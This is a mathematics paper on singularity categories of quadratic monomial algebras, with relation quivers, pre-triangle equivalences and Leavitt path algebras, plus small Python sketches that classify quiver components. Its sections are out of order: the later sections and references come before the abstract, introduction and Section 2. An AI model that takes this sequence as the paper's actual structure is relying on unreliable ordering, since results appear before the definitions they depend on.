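  e_1\,\alpha = 0 = \alpha\, e_2, \qquad
  \alpha^2 = 0 \ \ \text{(no path of length two exists in $Q$)},
\]
% and unit e_1 + e_2.
```

With the concatenation rule pq defined only when s(p)=t(q), this kQ is isomorphic to the algebra of 2×2 triangular matrices over k; since Q has no path of length two, here J2=0 and every admissible ideal is trivial.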
The set of non-zero paths forms a k-basis for A. For a path p in I, we write p=0 in A. For a non-zero path p, we consider the left ideal Ap generated by p, which has a k-basis given by the non-zero paths q such that q=q′p for some path q′. We observe that for a vertex i, Aei is an indecomposable projective A-module. Then we have a projective cover πp:Aet(p)→Ap sending et(p) to p.

Lemma 4.1 Let A=kQ/I be a quadratic monomial algebra. Then the following statements hold: (1) For a non-zero path p=αp′ with α an arrow, there is an isomorphism Ap≃Aα of A-modules sending xp to xα for any path x with s(x)=t(p). (2) For an arrow α, we have a short exact sequence of A-modules 0⟶⨁{β∈Q1∣βα∈F} Aβ⟶inc Aet(α)⟶πα Aα⟶0, (4.1) where ‘inc’ denotes the inclusion map. (3) For any A-module M, there is an isomorphism ΩA2(M)≃⨁α∈Q1(Aα)nα for some integers nα.

Proof (1) is trivial and (2) is straightforward; compare the first paragraph in [29, p. 162]. In view of (1), the statement (3) is a special case of [29, Theorem I].□

Let α be an arrow such that the set {β∈Q1∣βα∈F} is non-empty. By (4.1), this is equivalent to the condition that the A-module Aα is non-projective. Denote by N(α)={α′∈Q1 ∣ t(α′)=t(α), and βα′∈F for each arrow β satisfying βα∈F}. Set Z(α)=⨁α′∈N(α) α′A, which is the right ideal generated by N(α). We observe that α∈N(α). The second statement of the following result is analogous to [12, Lemma 2.3].

Lemma 4.2 Let α,α′ be two arrows. We assume that the set {β∈Q1∣βα∈F} is non-empty. Then we have the following statements: (1) There is an isomorphism HomA(Aα,A)→Z(α) sending f to f(α). (2) There is a k-linear isomorphism Hom̲A(Aα,Aα′)≅(Z(α)∩Aα′)/Z(α)α′. (4.2) (3) If α′ does not belong to N(α), we have Hom̲A(Aα,Aα′)=0. (4) If α′ belongs to N(α), there is a unique epimorphism π=πα,α′:Aα→Aα′ sending α to α′, and Hom̲A(Aα,Aα′)=kπ¯.

Proof We observe that Z(α) has a k-basis given by non-zero paths q which satisfy t(q)=t(α) and βq=0 for each arrow β with βα∈F.
Then we infer (1) by applying HomA(−,A) to (4.1) and using the canonical isomorphism HomA(Aet(α),A)≃et(α)A. For (2), we identify, for each left ideal K of A, HomA(Aα,K) with the subspace of HomA(Aα,A) formed by those morphisms whose image is contained in K. Therefore, we identify HomA(Aα,Aα′) with Z(α)∩Aα′, and HomA(Aα,Aet(α′)) with Z(α)∩Aet(α′). Recall the projective cover πα′:Aet(α′)→Aα′. The subspace p(Aα,Aα′) formed by those morphisms factoring through projective modules equals the image of the map HomA(Aα,πα′). This image is then identified with Z(α)α′, and the required isomorphism follows. The statement (3) is an immediate consequence of (2), since in this case we have Z(α)∩Aα′=Z(α)α′. For (4), we observe in this case that Z(α)∩Aα′=(Z(α)α′)⊕kα′. It follows from (2) that Hom̲A(Aα,Aα′) is one dimensional. The existence of the epimorphism π follows from the isomorphism in (1), under which π corresponds to the element α′. Then we are done.□

Remark 4.3 Assume that α′∈N(α); in particular, t(α)=t(α′). Then we have the following commutative diagram: The leftmost inclusion uses the fact that α′∈N(α), and thus {β∈Q1∣βα∈F}⊆{β∈Q1∣βα′∈F}.

The following notion is taken from [12, Section 5]; compare [17].

Definition 4.4 Let A=kQ/I be a quadratic monomial algebra. Denote by F the set of paths of length two in Q that are contained in I. The relation quiver RA of A is defined as follows: its vertices are the arrows of Q, and there is an arrow [βα] from α to β for each element βα in F.

We will consider the algebra B=kRA/J2 with radical square zero defined by RA. The main result of this paper is as follows.

Theorem 4.5 Let A=kQ/I be a quadratic monomial algebra, and let B=kRA/J2 be the algebra with radical square zero defined by the relation quiver of A. Then there is a pre-triangle quasi-equivalence connecting A-mod̲ and B-mod̲. Consequently, there is a singular equivalence between A and B.
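Definition 4.4 is entirely combinatorial, so it can be checked on small examples in code. The following sketch uses ad hoc encodings (a dict name → (source, target) for the arrows of Q, and name pairs in traversal order for F); none of this is notation from the paper.

```python
# Sketch of Definition 4.4: the relation quiver R_A of a quadratic
# monomial algebra A = kQ/I.

def relation_quiver(arrows, F):
    """arrows: dict mapping an arrow name of Q to its (source, target).
    F: set of pairs (alpha, beta) meaning the length-two path
    beta*alpha lies in I (alpha traversed first).
    Returns (vertices, arrows) of R_A: the vertices are the arrows
    of Q, and each relation beta*alpha gives an arrow alpha -> beta."""
    for alpha, beta in F:
        # beta*alpha must be a path in Q: t(alpha) = s(beta)
        assert arrows[alpha][1] == arrows[beta][0]
    return set(arrows), set(F)

# Example 5.5: A = k<x,y>/(x^2, y^2, yx); Q has one vertex "*" with
# two loops x and y, and F corresponds to the paths xx, yy, yx.
Q_arrows = {"x": ("*", "*"), "y": ("*", "*")}
V, E = relation_quiver(Q_arrows, {("x", "x"), ("y", "y"), ("x", "y")})
# R_A has a loop at x, a loop at y, and one arrow x -> y.
```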
For an arrow α in Q, we denote by Sα and Pα the simple B-module and the indecomposable projective B-module corresponding to the vertex α, respectively. We may identify Pα with Beα, where eα denotes the trivial path in RA at α. Hence, the B-module Pα has a k-basis {eα}∪{[βα]∣βα∈F}. We observe the following short exact sequence of B-modules 0⟶⨁{β∈Q1∣βα∈F} Sβ⟶iα Pα⟶Sα⟶0, (4.3) where iα identifies Sβ with the B-submodule k[βα].

We denote by B-ssmod̲ the full subcategory of B-mod̲ consisting of semisimple B-modules. We observe that for any B-module M, the syzygy ΩB(M) is semisimple; compare [11, Lemma 2.1]. Moreover, any homomorphism f:X→Y between semisimple modules splits, that is, it is isomorphic to a homomorphism of the form (0, 0; 0, IdZ):K⊕Z→C⊕Z for some B-modules K, C and Z, which is zero on K and the identity on the common summand Z. We infer that B-ssmod̲⊆B-mod̲ is a left triangulated subcategory. Moreover, all left triangles inside B-ssmod̲ are direct sums of trivial ones.

There is a unique k-linear functor F:B-ssmod̲→A-mod̲ sending Sα to Aα for each arrow α in Q. Here, for the well-definedness of F, we use the following fact, which can be obtained by comparing (4.1) and (4.3): the simple B-module Sα is projective if and only if so is the A-module Aα. We have the following key observation.

Lemma 4.6 The functor F:B-ssmod̲→A-mod̲ is a pre-triangle equivalence.

Proof Let α be an arrow in Q. We observe that (4.1) and (4.3) compute the syzygy modules ΩA(Aα) and ΩB(Sα), respectively. It follows that the functor F commutes with the syzygy functors. In other words, there is a natural isomorphism δ:FΩB→ΩAF such that (F,δ) is a looped functor. Since all morphisms in B-ssmod̲ split, each left triangle inside is a direct sum of trivial ones. It follows that F respects left triangles, that is, (F,δ) is a triangle functor. It remains to verify the conditions (S1)–(S3) in Proposition 2.2. Since the functor F is faithful, (S2) follows. The condition (S3) follows from Lemma 4.1(3). For (S1), we take a morphism g:F(X)→F(Y) in A-mod̲.
Without loss of generality, we assume that both X and Y are indecomposable, in which case both are simple B-modules. We assume that X=Sα and Y=Sα′. We assume that g is non-zero; in particular, F(X)=Aα is non-projective, or equivalently, the set {β∈Q1∣βα∈F} is non-empty. Observe that F(Y)=Aα′. We apply Lemma 4.2(3) to infer that α′∈N(α). Write π=πα,α′. By Lemma 4.2(4), we may assume that g=π¯. The commutative diagram in Remark 4.3 implies that ΩA(g) equals the inclusion morphism ⨁{β∈Q1∣βα∈F} Aβ⟶⨁{β∈Q1∣βα′∈F} Aβ. Take f to be the corresponding inclusion morphism ΩB(Sα)=⨁{β∈Q1∣βα∈F} Sβ⟶ΩB(Sα′)=⨁{β∈Q1∣βα′∈F} Sβ in B-ssmod̲. Then we identify F(f) with ΩA(g); more precisely, we have ΩA(g)=δY◦F(f)◦(δX)−1. This proves the condition (S1).□

We now prove Theorem 4.5.

Proof of Theorem 4.5 Consider the inclusion functor inc:B-ssmod̲→B-mod̲. As mentioned above, this is a triangle functor. Recall that the syzygy of any B-module is semisimple, that is, it lies in B-ssmod̲. Then the inclusion functor is a pre-triangle equivalence by Corollary 2.3. Recall the pre-triangle equivalence F:B-ssmod̲→A-mod̲ in Lemma 4.6. Then we have the required pre-triangle quasi-equivalence A-mod̲⟵F B-ssmod̲⟶inc B-mod̲. The last statement follows from Proposition 3.2. We mention that by the explicit construction of the functor F, the resulting triangle equivalence Dsg(A)→Dsg(B) sends Aα to Sα for each arrow α in Q.□

Remark 4.7 We will observe in the proof of Proposition 5.3 below that the singular equivalence in Theorem 4.5 restricts to a triangle equivalence between A-Gproj̲ and B-Gproj̲. Consequently, it induces a triangle equivalence between Ddef(A) and Ddef(B). We emphasize that in general a singular equivalence need not induce a triangle equivalence between Gorenstein defect categories.

5. Consequences and examples

In this section, we draw some consequences of Theorem 4.5 and describe some examples.
We first make some preparation by recalling some known results on the singularity category of an algebra with radical square zero. For a finite quiver Q, we recall that a vertex in Q is a sink if there is no arrow starting at it. We denote by Q0 the quiver without sinks that is obtained from Q by repeatedly removing sinks. The double quiver Q¯ of Q is obtained from Q by adding, for each α∈Q1, a new arrow α* in the reverse direction, that is, s(α*)=t(α) and t(α*)=s(α). Recall that the Leavitt path algebra L(Q) of Q with coefficients in k is the quotient algebra of kQ¯ modulo the two-sided ideal generated by the following elements: {αβ*−δα,β et(α)∣α,β∈Q1}∪{∑{α∈Q1∣s(α)=i} α*α−ei∣i∈Q0 a non-sink}. Here, δ denotes the Kronecker symbol. Then L(Q) has a natural Z-grading given by deg ei=0, deg α=1 and deg α*=−1. We denote by L(Q)-grproj the category of finitely generated Z-graded projective left L(Q)-modules, and by (−1):L(Q)-grproj→L(Q)-grproj the degree-shift functor by degree −1. For details on Leavitt path algebras, we refer to [1, 13, 27].

We denote by kQ/J2 the algebra with radical square zero defined by Q. For n≥1, we denote by Zn the basic n-cycle, which is a connected quiver consisting of n vertices and n arrows which form an oriented cycle. Then the algebra kZn/J2 is self-injective. In particular, the stable module category kZn/J2-mod̲ is triangle equivalent to Dsg(kZn/J2).

An abelian category A is semisimple if any short exact sequence splits. For example, if the quiver Q has no sinks, the category L(Q)-grproj is a semisimple abelian category; see [13, Lemma 4.1]. For a semisimple abelian category A and an auto-equivalence Σ on A, there is a unique triangulated structure on A with Σ the translation functor; indeed, all triangles are direct sums of trivial ones. The resulting triangulated category is denoted by (A,Σ); see [10, Lemma 3.4]. As an example, we will consider the triangulated category (L(Q)-grproj,(−1)) for a quiver Q without sinks.
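As a sanity check, not carried out in the paper, the smallest case makes these definitions concrete: the basic 1-cycle Z1 has one vertex e and one loop α.

```latex
% For Q = Z_1 the defining relations collapse to inverting \alpha:
\[
L(Z_1)\;=\;k\langle \alpha,\alpha^{*}\rangle\big/
\bigl(\alpha\alpha^{*}-e,\ \alpha^{*}\alpha-e\bigr)
\;\cong\;k[x,x^{-1}],\qquad \deg x=1.
\]
% This algebra is strongly graded with degree-zero part k, so taking
% degree-zero parts gives an equivalence
\[
L(Z_1)\text{-}\mathrm{grproj}\;\simeq\;k\text{-}\mathrm{mod},
\]
% under which the degree-shift functor (-1) corresponds to the
% identity functor.
```

This is consistent with Example 5.1 below in the case n=1, where the resulting triangulated category is denoted T1.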
Example 5.1 Let kn=k×k×⋯×k be the product algebra of n copies of k. Consider the automorphism σ:kn→kn sending (a1,a2,…,an) to (a2,…,an,a1), which induces an automorphism σ*:kn-mod→kn-mod by twisting the kn-action on modules. We observe that there are triangle equivalences (kn-mod,σ*)⟶∼ kZn/J2-mod̲⟶∼(L(Zn)-grproj,(−1)). The first equivalence is well known, and the second one is a special case of [13, Theorem 6.1]. We will denote this triangulated category by Tn.

Let Q be a finite quiver. We call a connected component C of Q perfect (resp. acyclic) if it is a basic cycle (resp. if it contains no oriented cycles). A connected component is defect if it is neither perfect nor acyclic. Then we have a disjoint union Q=Qperf∪Qac∪Qdef, where Qperf (resp. Qac, Qdef) is the union of all the perfect (resp. acyclic, defect) components in Q. Denote by B=kQ/J2. Then we have a decomposition of algebras B=Bperf×Bac×Bdef. We summarize the known results on the singularity category and the Gorenstein defect category of an algebra with radical square zero.

Lemma 5.2 Keep the notation as above. Then the following statements hold: (1) There is a triangle equivalence Dsg(B)≃Bperf-mod̲×Dsg(Bdef). (2) There is a triangle equivalence B-Gproj̲≃Bperf-mod̲, which is triangle equivalent to a product of categories of the form Tn. (3) There is a triangle equivalence Ddef(B)≃Dsg(Bdef), which is triangle equivalent to (L((Qdef)0)-grproj,(−1)).

Proof We observe that the algebra Bperf is self-injective and that Bac has finite global dimension. Then (1) is a consequence of the decomposition Dsg(B)=Dsg(Bperf)×Dsg(Bac)×Dsg(Bdef) of categories. For (2), we note that any Bperf-module is Gorenstein-projective and that a Gorenstein-projective Bac-module is necessarily projective. By [11, Theorem 1.1], any Gorenstein-projective Bdef-module is projective. Then (2) follows by a similar decomposition of B-Gproj̲; the last statement of (2) follows from Example 5.1, since Bperf is isomorphic to a product of algebras of the form kZn/J2.
By (1) and (2), the functor GB:B-Gproj̲→Dsg(B) is identified with the inclusion, and the required triangle equivalence in (3) follows immediately. The last statement of (3) follows by combining [10, Proposition 4.2] and [13, Theorem 6.1]; compare [10, Theorem B] and [27, Theorem 5.9].□

In what follows, let A=kQ/I be a quadratic monomial algebra with RA its relation quiver. We denote by {C1,C2,…,Cm} the set of all the perfect components in RA, and by di the number of vertices in the basic cycle Ci. Let B=kRA/J2 be the algebra with radical square zero defined by RA. We consider the triangle equivalence Φ:Dsg(A)→Dsg(B) obtained in Theorem 4.5. We identify the fully faithful functors GA and GB with inclusions. The following result describes the singularity category and the Gorenstein defect category of a quadratic monomial algebra. We mention that the equivalence in Proposition 5.3(2) is due to [12, Theorem 5.7], where it is obtained by a completely different method.

Proposition 5.3 The triangle equivalence Φ:Dsg(A)→Dsg(B) restricts to a triangle equivalence A-Gproj̲→∼B-Gproj̲, and thus induces a triangle equivalence Ddef(A)→∼Ddef(B). Consequently, we have the following triangle equivalences: (1) Dsg(A)→∼A-Gproj̲×Ddef(A); (2) A-Gproj̲→∼Bperf-mod̲→∼Td1×Td2×⋯×Tdm; (3) Ddef(A)→∼Dsg(Bdef)→∼(L(Q′)-grproj,(−1)) with Q′=(RAdef)0.

Proof Recall from the proof of Theorem 4.5 that Φ(Aα)=Sα for each arrow α in Q. By [12, Lemma 5.4(1)], the A-module Aα is non-projective Gorenstein-projective if and only if α, as a vertex, lies in a perfect component of RA. Moreover, any indecomposable non-projective Gorenstein-projective A-module arises in this way. On the other hand, any indecomposable non-projective Gorenstein-projective B-module is of the form Sα with α in RAperf; see Lemma 5.2(2). It follows that the equivalence Φ restricts to the equivalence A-Gproj̲→∼B-Gproj̲. The three triangle equivalences follow immediately from the equivalences in Lemma 5.2.□

We end the paper with examples on Proposition 5.3.
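The decomposition of RA into perfect, acyclic and defect components that drives Proposition 5.3 is purely graph-theoretic, so it can be sketched in code. This is an illustration with ad hoc encodings (vertices as hashables, arrows as (source, target) pairs); the sample quiver imitates the shape of the relation quiver in Example 5.6 — one 2-cycle and one component consisting of a 2-cycle with an extra arrow attached — but is not taken verbatim from the paper.

```python
# Classify the connected components of a finite quiver as
# perfect (a basic cycle), acyclic (no oriented cycle) or defect.
from collections import defaultdict, deque

def components(vertices, arrows):
    """Connected components of the underlying undirected graph."""
    adj = defaultdict(set)
    for s, t in arrows:
        adj[s].add(t)
        adj[t].add(s)
    seen, comps = set(), []
    for v in vertices:
        if v in seen:
            continue
        comp, queue = set(), deque([v])
        while queue:
            u = queue.popleft()
            if u in comp:
                continue
            comp.add(u)
            queue.extend(adj[u] - comp)
        seen |= comp
        comps.append(comp)
    return comps

def classify(comp, arrows):
    arrs = [(s, t) for s, t in arrows if s in comp]
    indeg, outdeg = defaultdict(int), defaultdict(int)
    for s, t in arrs:
        outdeg[s] += 1
        indeg[t] += 1
    # a basic cycle: n vertices, n arrows, all degrees equal to one
    if len(arrs) == len(comp) and all(
            indeg[v] == 1 and outdeg[v] == 1 for v in comp):
        return "perfect"
    # Kahn's algorithm: acyclic iff the component can be emptied by
    # repeatedly removing vertices of in-degree zero
    deg = {v: indeg[v] for v in comp}
    out = defaultdict(list)
    for s, t in arrs:
        out[s].append(t)
    queue = deque(v for v in comp if deg[v] == 0)
    removed = 0
    while queue:
        v = queue.popleft()
        removed += 1
        for t in out[v]:
            deg[t] -= 1
            if deg[t] == 0:
                queue.append(t)
    return "acyclic" if removed == len(comp) else "defect"

# One perfect 2-cycle {a, b}; one defect component {c, d, x}.
V = {"a", "b", "c", "d", "x"}
E = [("a", "b"), ("b", "a"), ("c", "d"), ("d", "c"), ("x", "d")]
```

For the sample data, the component {a, b} is classified as perfect (contributing a factor Td with d=2) and {c, d, x} as defect.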
Example 5.4 Let A be a quadratic monomial algebra which is Gorenstein. By [12, Proposition 5.5(1)], this is equivalent to the condition that the relation quiver RA has no defect components; for example, any gentle algebra satisfies this condition. Note that Ddef(A) is trivial. Then we obtain a triangle equivalence Dsg(A)⟶∼Td1×Td2×⋯×Tdm, where the di denote the sizes of the perfect components of RA. This result extends [20, Theorem 2.5(b)]; see also [8].

Example 5.5 Let A=k⟨x,y⟩/I be the quotient algebra of the free algebra k⟨x,y⟩ by the ideal I=(x2,y2,yx). Then the relation quiver RA is as follows: The relation quiver has no perfect components. Then we have triangle equivalences Dsg(A)≃Ddef(A)≃(L(RA)-grproj,(−1)).

Example 5.6 Consider the following quiver Q and the algebra A=kQ/I with I=(βα,αβ,δγ,γδ,δξ): Its relation quiver RA is as follows: There is one perfect component and one defect component; moreover, we observe that (RAdef)0=Z2. Then we have triangle equivalences A-Gproj̲≃T2 and Ddef(A)≃(L(Z2)-grproj,(−1)), which is equivalent to T2; see Example 5.1. Therefore, we have a triangle equivalence Dsg(A)≃T2×T2.

Acknowledgements The author thanks the referee for many useful comments, and thanks Dawei Shen and Dong Yang for helpful discussions. The author still remembers that Professor Ragnar-Olaf Buchweitz sent a copy of the masterpiece [7] to him around 10 years ago.

Funding This work is supported by the National Natural Science Foundation of China (Nos. 11522113 and 11671245) and the Fundamental Research Funds for the Central Universities.

References
1 G. Abrams and G. Aranda Pino, The Leavitt path algebra of a graph, J. Algebra 293 (2005), 319–334.
2 M. Auslander and M. Bridger, Stable module theory, Mem. Amer. Math. Soc. 94, Amer. Math. Soc., Providence, RI, 1969.
3 M. Auslander, I. Reiten and S. O. Smalø, Representation Theory of Artin Algebras, Cambridge Studies in Adv. Math. 36, Cambridge University Press, Cambridge, 1995.
4 A.
Beligiannis, The homological theory of contravariantly finite subcategories: Auslander–Buchweitz contexts, Gorenstein categories and (co-)stabilization, Commun. Algebra 28 (2000), 4547–4596.
5 A. Beligiannis and M. Marmaridis, Left triangulated categories arising from contravariantly finite subcategories, Commun. Algebra 22 (1994), 5021–5036.
6 P. A. Bergh, D. A. Jorgensen and S. Oppermann, The Gorenstein defect category, Quart. J. Math. 66 (2015), 459–471.
7 R. O. Buchweitz, Maximal Cohen–Macaulay Modules and Tate Cohomology over Gorenstein Rings, unpublished manuscript, 1987. Available at: http://hdl.handle.net/1807/16682.
8 X. Chen, S. Geng and M. Lu, The singularity categories of the cluster-tilted algebras of Dynkin type, Algebr. Represent. Theor. 18 (2015), 532–554.
9 X. W. Chen, Singularity categories, Schur functors and triangular matrix rings, Algebr. Represent. Theor. 12 (2009), 181–191.
10 X. W. Chen, The singularity category of an algebra with radical square zero, Doc. Math. 16 (2011), 921–936.
11 X. W. Chen, Algebras with radical square zero are either self-injective or CM-free, Proc. Amer. Math. Soc. 140 (2012), 93–98.
12 X. W. Chen, D. Shen and G. Zhou, The Gorenstein-projective modules over a monomial algebra, Proc. Royal Soc. Edin. Sect. A Math., accepted for publication; arXiv:1501.02978.
13 X. W. Chen and D. Yang, Homotopy categories, Leavitt path algebras and Gorenstein projective modules, Int. Math. Res. Not. 10 (2015), 2597–2633.
14 D. Happel, Triangulated Categories in the Representation Theory of Finite Dimensional Algebras, London Math. Soc. Lecture Notes Ser. 119, Cambridge University Press, Cambridge, 1988.
15 D. Happel, On Gorenstein algebras, in: Progress in Math. 95, Birkhäuser Verlag, Basel, 1991, 389–404.
16 A.
Heller, Stable homotopy categories, Bull. Amer. Math. Soc. 74 (1968), 28–63.
17 C. Holdaway and S. P. Smith, An equivalence of categories for graded modules over monomial algebras and path algebras of quivers, J. Algebra 353 (2012), 249–260; Corrigendum, J. Algebra 357 (2012), 319–321.
18 M. Hoshino, Algebras of finite self-injective dimension, Proc. Amer. Math. Soc. 112 (1991), 619–622.
19 T. Howard, Complexity classes of modules over finite dimensional algebras, J. Pure Appl. Algebra 219 (2015), 5195–5205.
20 M. Kalck, Singularity categories of gentle algebras, Bull. London Math. Soc. 47 (2015), 65–74.
21 B. Keller and D. Vossieck, Sous les catégories dérivées, C. R. Acad. Sci. Paris, t. 305, Série I (1987), 225–228.
22 D. Orlov, Triangulated categories of singularities and D-branes in Landau–Ginzburg models, Trudy Steklov Math. Inst. 204 (2004), 240–262.
23 C. Psaroudakis, O. Skartsaterhagen and O. Solberg, Gorenstein categories, singular equivalences and finite generation of cohomology rings in recollements, Trans. Amer. Math. Soc. Ser. B 1 (2014), 45–95.
24 D. Quillen, Higher algebraic K-theory I, Springer Lecture Notes in Math. 341, 1973, 85–147.
25 J. Rickard, Derived categories and stable equivalence, J. Pure Appl. Algebra 61 (1989), 303–317.
26 D. Shen, The singularity category of a Nakayama algebra, J. Algebra 429 (2015), 1–18.
27 S. P. Smith, Equivalence of categories involving graded modules over path algebras of quivers, Adv. Math. 230 (2012), 1780–1810.
28 M. Tierney, Categorical Constructions in Stable Homotopy Theory, Lecture Notes in Math.
87, Springer-Verlag, Berlin, Heidelberg, New York, 1969.
29 B. Zimmermann Huisgen, Predicting syzygies over monomial relation algebras, Manuscripta Math. 70 (1991), 157–182.
30 A. Zimmermann and G. Zhou, On singular equivalences of Morita type, J. Algebra 385 (2013), 64–79.

© The Author(s) 2018. Published by Oxford University Press. All rights reserved. For permissions, please e-mail: journals.permissions@oup.com

The Quarterly Journal of Mathematics, Oxford University Press. The singularity category of a quadratic monomial algebra, Advance Article, 12 March 2018, 19 pages. ISSN 0033-5606; eISSN 1464-3847; DOI 10.1093/qmath/hay006.

Abstract We exploit singular equivalences between artin algebras that are induced from certain functors between the stable module categories. Such functors are called pre-triangle equivalences. We construct two pre-triangle equivalences connecting the stable module category over a quadratic monomial algebra to the one over an algebra with radical square zero. Consequently, we obtain an explicit singular equivalence between the two algebras. It turns out that this singular equivalence restricts to a triangle equivalence between their stable categories of Gorenstein-projective modules, and thus induces a triangle equivalence between their Gorenstein defect categories.

1.
Introduction

Let A be an artin algebra. The singularity category Dsg(A) of A is introduced in [7] under the name ‘the stable derived category’. The terminology is justified by the following fact: the algebra A has finite global dimension if and only if the singularity category Dsg(A) is trivial. Hence, the singularity category provides a homological invariant for algebras of infinite global dimension.

The singularity category captures the stable homological property of an algebra. More precisely, certain information about the syzygy endofunctor on the stable A-module category is encoded in Dsg(A). Indeed, as observed in [21], the singularity category is equivalent to the stabilization of the pair that consists of the stable module category and the syzygy endofunctor on it; see also [4]. This fact is used in [10] to describe the singularity category of an algebra with radical square zero. We mention that related results appear in [19, 26].

By the fundamental result in [7], the stable category of Gorenstein-projective A-modules may be viewed as a triangulated subcategory of Dsg(A). Moreover, if the algebra A is Gorenstein, the two categories are triangle equivalent. We mention that the study of Gorenstein-projective modules goes back to [2] under the name ‘modules of G-dimension zero’. The Verdier quotient triangulated category Ddef(A) of Dsg(A) by the stable category of Gorenstein-projective A-modules is called the Gorenstein defect category of A in [6]. This terminology is justified by the fact that the algebra A is Gorenstein if and only if the category Ddef(A) is trivial. In other words, the Gorenstein defect category measures how far the algebra is from being Gorenstein.

By a singular equivalence between two algebras, we mean a triangle equivalence between their singularity categories. We observe that a derived equivalence implies a singular equivalence. However, the converse is not true; for such examples, see [9, 23].
In general, a singular equivalence does not induce a triangle equivalence between Gorenstein defect categories. We mention the work [30], where a class of nice singular equivalences is studied.

The aim of this paper is to study the singularity category of a quadratic monomial algebra. The main ingredient is the following observation: for two algebras, a certain functor between their stable module categories induces a singular equivalence after the stabilization. We call such a functor a pre-triangle equivalence between the stable module categories. More generally, the two stable module categories are called pre-triangle quasi-equivalent provided that there is a zigzag of pre-triangle equivalences connecting them. In this case, we also have a singular equivalence.

The main result, Theorem 4.5, claims a pre-triangle quasi-equivalence between the stable module category of a quadratic monomial algebra and that of an algebra with radical square zero. Combining this with the results in [10, 13, 27], we describe the singularity category of a quadratic monomial algebra via the category of finitely generated graded projective modules over the Leavitt path algebra of a certain quiver; see Proposition 5.3. We mention that this description extends the result in [20] on the singularity category of a gentle algebra; see also [8, 12].

The paper is organized as follows. In Section 2, we recall the stabilization of a looped category. We introduce the notion of a pre-stable equivalence between looped categories, which is a functor between looped categories that induces an equivalence after the stabilization. A pre-stable equivalence in the left triangulated case is called a pre-triangle equivalence, which induces a triangle equivalence after the stabilization. In Section 3, we recall the result in [21] which states that the singularity category of an algebra is triangle equivalent to the stabilization of the stable module category.
Therefore, a pre-triangle equivalence between stable module categories induces a singular equivalence; see Proposition 3.2 and compare Proposition 3.6. We include explicit examples of pre-triangle equivalences between stable module categories. In Section 4, we associate to a quadratic monomial algebra A an algebra B with radical square zero; compare [12]. We construct explicitly two pre-triangle equivalences connecting the stable A-module category to the stable B-module category. Then we obtain the required singular equivalence between A and B; see Theorem 4.5. In Section 5, we combine Theorem 4.5 with the results in [10, 13, 27] on the singularity category of an algebra with radical square zero. We describe the singularity category and the Gorenstein defect category of a quadratic monomial algebra via the categories of finitely generated graded projective modules over Leavitt path algebras of certain quivers; see Proposition 5.3. We discuss some concrete examples at the end.

2. The stabilization of a looped category

In this section, we recall the construction of the stabilization of a looped category. The basic references are [16, Chapter I], [28, Section 1], [21] and [4, Section 3]. Following [4], a looped category (C,Ω) consists of a category C with an endofunctor Ω:C→C, called the loop functor. The looped category (C,Ω) is said to be stable if the loop functor Ω is an auto-equivalence on C, and strictly stable if Ω is an automorphism. By a looped functor (F,δ) between two looped categories (C,Ω) and (D,Δ), we mean a functor F:C→D together with a natural isomorphism δ:FΩ→ΔF. For a looped functor (F,δ), we define inductively for each i≥1 a natural isomorphism δi:FΩi→ΔiF such that δ1=δ and δi+1=Δiδ◦δiΩ. Set δ0 to be the identity transformation on F, where Ω0 and Δ0 are defined to be the identity functors. We say that a looped functor (F,δ):(C,Ω)→(D,Δ) is strictly looped provided that FΩ=ΔF as functors and δ is the identity transformation on FΩ.
In this case, we write (F,δ) as F; compare [16, 1.1]. Let (C,Ω) be a looped category. We define a category S=S(C,Ω) as follows. The objects of S are pairs (X,n) with X an object in C and n∈Z. The Hom-set is defined by the following formula: HomS((X,n),(Y,m))=colim HomC(Ωi−n(X),Ωi−m(Y)), (2.1) where i runs over all integers satisfying i≥n and i≥m. An element f in HomS((X,n),(Y,m)) is said to have an ith representative fi:Ωi−n(X)→Ωi−m(Y) provided that the canonical image of fi equals f. The composition of morphisms in S is induced by the one in C. We observe that Ω˜:S→S sending (X,n) to (X,n−1) is an automorphism. Then we have a strictly stable category (S,Ω˜).

There is a canonical functor S:C→S sending X to (X,0), and a morphism f to S(f) whose 0th representative is f. For an object X in C, we have a natural isomorphism θX:(ΩX,0)⟶(X,−1), whose 0th representative is IdΩX. Indeed, this yields a looped functor (S,θ):(C,Ω)⟶(S,Ω˜). This process is called in [16] the stabilization of the looped category (C,Ω). We mention that S:C→S is an equivalence if and only if (C,Ω) is a stable category, in which case we identify (C,Ω) with (S,Ω˜).

The stabilization functor (S,θ) enjoys a universal property; see [16, Proposition 1.1]. Let (F,δ):(C,Ω)→(D,Δ) be a looped functor with (D,Δ) a strictly stable category. We denote by Δ−1 the inverse of Δ. Then there is a unique functor F˜:(S,Ω˜)→(D,Δ) which is strictly looped and satisfies F=F˜S and δ=F˜θ. The functor F˜ sends (X,n) to Δ−nF(X). For a morphism f:(X,n)→(Y,m) whose ith representative is given by fi:Ωi−n(X)→Ωi−m(Y), we have F˜(f)=Δ−i((δYi−m)◦F(fi)◦(δXi−n)−1):Δ−nF(X)⟶Δ−mF(Y). (2.2)

Lemma 2.1 Keep the notation as above.
Then the functor F˜:(S,Ω˜)→(D,Δ) is an equivalence if and only if the following conditions are satisfied: (1) for any morphism g:F(X)→F(Y) in D, there exist i≥0 and a morphism f:Ωi(X)→Ωi(Y) in C satisfying Δi(g)=δYi◦F(f)◦(δXi)−1; (2) for any two morphisms f,f′:X→Y in C with F(f)=F(f′), there exists i≥0 such that Ωi(f)=Ωi(f′); (3) for any object Z in D, there exist i≥0 and an object X in C satisfying Δi(Z)≃F(X).

Proof Indeed, the above three conditions are equivalent to the statements that F˜ is full, faithful and dense, respectively. We refer to [28, 1.2 Proposition] for the details, and compare [4, Proposition 3.4].□

We now apply Lemma 2.1 to a specific situation. Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. Consider the composition (C,Ω)⟶(F,δ)(C′,Ω′)⟶(S,θ)(S(C′,Ω′),Ω˜′). (2.3) By the universal property of the stabilization, there is a unique strictly looped functor S(F,δ):(S(C,Ω),Ω˜)→(S(C′,Ω′),Ω˜′) making the following diagram commutative: We call the functor S(F,δ) the stabilization of (F,δ).

Proposition 2.2 Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. Then its stabilization S(F,δ) is an equivalence if and only if the following conditions are satisfied: (S1) for any morphism g:F(X)→F(Y) in C′, there exist i≥0 and a morphism f:Ωi(X)→Ωi(Y) in C satisfying Ω′i(g)=δYi◦F(f)◦(δXi)−1; (S2) for any two morphisms f,f′:X→Y in C with F(f)=F(f′), there exists i≥0 such that Ωi(f)=Ωi(f′); (S3) for any object C′ in C′, there exist i≥0 and an object X in C satisfying Ω′i(C′)≃F(X).

